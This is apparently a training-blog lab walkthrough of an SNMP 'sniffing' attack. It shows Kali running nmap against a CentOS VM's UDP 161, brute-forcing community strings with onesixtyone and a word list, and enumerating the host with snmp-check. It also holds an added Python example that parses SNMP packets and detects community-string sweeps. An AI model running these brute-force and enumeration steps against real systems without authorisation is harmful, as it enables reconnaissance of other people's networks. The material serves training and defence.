Information Security (old version) / Attack Tools & Information Gathering 2016. 5. 25. 17:33

Attack Tools & Information Gathering - 12. SNMP Sniffing Attack

 

 

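This material is put together for hands-on practice required in a training course. If it is used for personal purposes or with malicious intent, legal responsibility rests with the person who does so.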

 

 

@ CentOS

 

 - Install and enable the SNMP packages

 

[root@CentOS /root]# yum -y install net-snmp net-snmp-libs net-snmp-utils

[root@CentOS /root]# service snmpd start
Starting snmpd:                                            [  OK  ]
[root@CentOS /root]# 
[root@CentOS /root]# chkconfig snmpd on
[root@CentOS /root]# chkconfig --list snmpd
snmpd           0:off   1:off   2:on    3:on    4:on    5:on    6:off

 

 

@ Kali Linux

 

 - Use nmap to scan the SNMP service port on CentOS.

 

root@kali:~# nmap -sU -p 161 192.168.20.200

 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-05-25 17:09 KST
Nmap scan report for 192.168.20.200
Host is up (0.00059s latency).
PORT    STATE SERVICE
161/udp open  snmp
MAC Address: 00:0C:29:72:28:7C (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 0.65 seconds

 

 

 - Start Wireshark and begin capturing (Capture -> Interfaces -> click Start on eth1)

 

root@kali:~# wireshark &

 

 

 - Run a dictionary attack against CentOS (tool: onesixtyone)

 

root@kali:~# onesixtyone
onesixtyone 0.3.2 [options] <host> <community>
  -c <communityfile> file with community names to try
  -i <inputfile>     file with target hosts
  -o <outputfile>    output log
  -d                 debug mode, use twice for more information

  -w n               wait n milliseconds (1/1000 of a second) between sending packets (default 10)
  -q                 quiet mode, do not print log to stdout, use with -l
examples: ./s -c dict.txt 192.168.4.1 public
          ./s -c dict.txt -i hosts -o my.log -w 100

 

 

 - Check the 'dict.txt' file

 

root@kali:~# cd /usr/share/doc/onesixtyone/
root@kali:/usr/share/doc/onesixtyone#
root@kali:/usr/share/doc/onesixtyone# ls
README  changelog.Debian.gz  changelog.gz  copyright  dict.txt

root@kali:/usr/share/doc/onesixtyone# cat dict.txt
~ (middle omitted) ~

 

 

root@kali:/usr/share/doc/onesixtyone# egrep '(public|private)' dict.txt
private
public

 

 

 - Perform SNMP sniffing against CentOS

 

root@kali:/usr/share/doc/onesixtyone# onesixtyone -c dict.txt 192.168.20.200
Scanning 1 hosts, 49 communities
192.168.20.200 [public] Linux CentOS 2.6.18-371.el5 #1 SMP Tue Oct 1 08:35:08 EDT 2013 x86_64

 

 

root@kali:/usr/share/doc/onesixtyone# cd
root@kali:~#

 

 

 - Review the Wireshark capture and stop capturing
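
What the capture of the onesixtyone run contains, as an added example that is not part of the original post: SNMPv1/v2c carries the community string unencrypted in every request, so a capture exposes it and also lets a defender spot one source cycling through many strings. The source addresses 192.168.20.50 and 192.168.20.10, the word list and all function names are constructed for illustration.

```python
from collections import defaultdict

def tlv(tag, value):
    """Encode one BER element (short-form length is enough for these samples)."""
    return bytes([tag, len(value)]) + value

def build_get(community, req_id=1):
    """Constructed SNMPv1 GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0)."""
    varbind = tlv(0x30, tlv(0x06, bytes.fromhex("2b06010201010100")) + tlv(0x05, b""))
    pdu = tlv(0xA0, tlv(0x02, bytes([req_id])) + tlv(0x02, b"\x00") * 2 + tlv(0x30, varbind))
    return tlv(0x30, tlv(0x02, b"\x00") + tlv(0x04, community) + pdu)

def read_tlv(buf, off=0):
    """Decode one BER element; returns (tag, value, offset of the next element)."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:                      # long form: low 7 bits = count of length bytes
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    if off + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[off:off + length], off + length

def parse_snmp(payload):
    """Return (version, community, pdu_tag) for SNMPv1/v2c, else None."""
    try:
        tag, body, _ = read_tlv(payload)
        t_ver, ver, off = read_tlv(body)
        t_com, community, off = read_tlv(body, off)
        if (tag, t_ver, t_com) != (0x30, 0x02, 0x04):
            return None                    # SNMPv3 carries no community field here
        return int.from_bytes(ver, "big"), community.decode("latin-1"), body[off]
    except (ValueError, IndexError):
        return None

def community_sweeps(datagrams, threshold=5):
    """Map each source IP to the communities it tried, if it tried >= threshold distinct ones."""
    tried = defaultdict(set)
    for src, payload in datagrams:
        if (msg := parse_snmp(payload)):
            tried[src].add(msg[1])
    return {src: sorted(c) for src, c in tried.items() if len(c) >= threshold}

# Constructed sample: UDP/161 payloads sent to 192.168.20.200, keyed by source IP.
WORDS = [b"admin", b"cisco", b"monitor", b"private", b"public", b"secret"]
SAMPLE = [("192.168.20.50", build_get(w, i + 1)) for i, w in enumerate(WORDS)]
SAMPLE += [("192.168.20.10", build_get(b"public", 7))] * 3   # a poller reusing one community

if __name__ == "__main__":
    print(parse_snmp(SAMPLE[4][1]), community_sweeps(SAMPLE))
```

Version 0 in the parsed tuple is SNMPv1 and 1 is SNMPv2c; the poller at 192.168.20.10 is not flagged because it only ever uses one community string.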
 

 

 

 

 - Download 'snmpcheck'


root@kali:~# cd /test
root@kali:/test# git clone git://git.kali.org/packages/snmpcheck.git

 

 

root@kali:/test# ls
VMwareTools-9.6.1-1378637.tar.gz  snmpcheck                 vmware-tools-upgrader-64
manifest.txt                      vmware-tools-distrib
run_upgrader.sh                   vmware-tools-upgrader-32

 

 

root@kali:/test# snmp-check

snmpcheck v1.8 - SNMP enumerator

Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

 

 Usage snmpcheck -t <IP address>

 

           -t : target host;

 

           -p : SNMP port; default port is 161;

           -c : SNMP community; default is public;

           -v : SNMP version (1,2); default is 1;

           -r : request retries; default is 0;

 

           -w : detect write access (separate action by enumeration);

 

           -d : disable 'TCP connections' enumeration!

           -T : force timeout in seconds; default is 20. Max is 60;

           -D : enable debug;

           -h : show help menu; 

 

 

 - Perform SNMP sniffing against CentOS (tool: snmpcheck)

 

root@kali:/test# snmp-check -t 192.168.20.200 -c public -p 161
snmpcheck.pl v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

 

 [*] Try to connect to 192.168.20.200
 [*] Connected to 192.168.20.200
 [*] Starting enumeration at 2016-05-25 17:39:58

 

 [*] System information
 -----------------------------------------------------------------------------------------------

 

 Hostname               : CentOS

 Description            : Linux CentOS 2.6.18-371.el5 #1 SMP Tue Oct 1 08:35:08 EDT 2013 x86_64
 Uptime system          : 4 hours, 01:52.06
 Uptime SNMP daemon     : 31 minutes, 38.22
 Contact                : Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
 Location               : Unknown (edit /etc/snmp/snmpd.conf)

 Motd                   : -

 [*] Network information
 -----------------------------------------------------------------------------------------------

 

 IP forwarding enabled   : -
 Default TTL             : -
 TCP segments received   : -
 TCP segments sent       : -
 TCP segments retrans.   : -
 Input datagrams         : -
 Delivered datagrams     : -
 Output datagrams        : -

 

 [*] Enumerated 192.168.20.200 in 0.10 seconds
Signal USR1 received in thread 1, but no signal handler set. at ./snmpcheck-1.8.pl line 230.

 

 

[YouTube] Video lecture link (Subscribe! Like!!!)


Attack Tools & Information Gathering - Chapter 12. SNMP Sniffing Attack  https://youtu.be/d8F04c-u0FU 

Posted by instructor 김정우 (KakaoTalk: kim10322)